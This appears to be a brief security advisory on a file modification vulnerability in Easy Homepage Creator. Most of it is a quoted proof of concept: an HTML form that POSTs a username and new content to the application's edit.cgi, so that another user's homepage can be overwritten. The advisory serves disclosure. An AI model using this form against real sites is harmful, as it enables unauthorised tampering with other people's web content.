|
Ben Chivers Easy Homepage Creator File Modification Vulnerability
The following proof of concept was provided by Arek Suroboyo <ar3su@yahoo.com>: <html><center> <h1>Easy Homepage Creator Vulnerability</h1> <table border=0 cellpadding=2 cellspacing=1 width="90%"> <FORM method="POST" name=edit action="http://victim/homepage/edit.cgi"> Username: <input name="username"><br> You can edit other user homepage below : <textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88"> Please type your messages in here. </textarea> <tr> <td class=top> <input class=button type="submit" value="Edit Homepage" name="edit_homepage"></td> </tr> </FORM> </table> </html> |
|
|
Privacy Statement |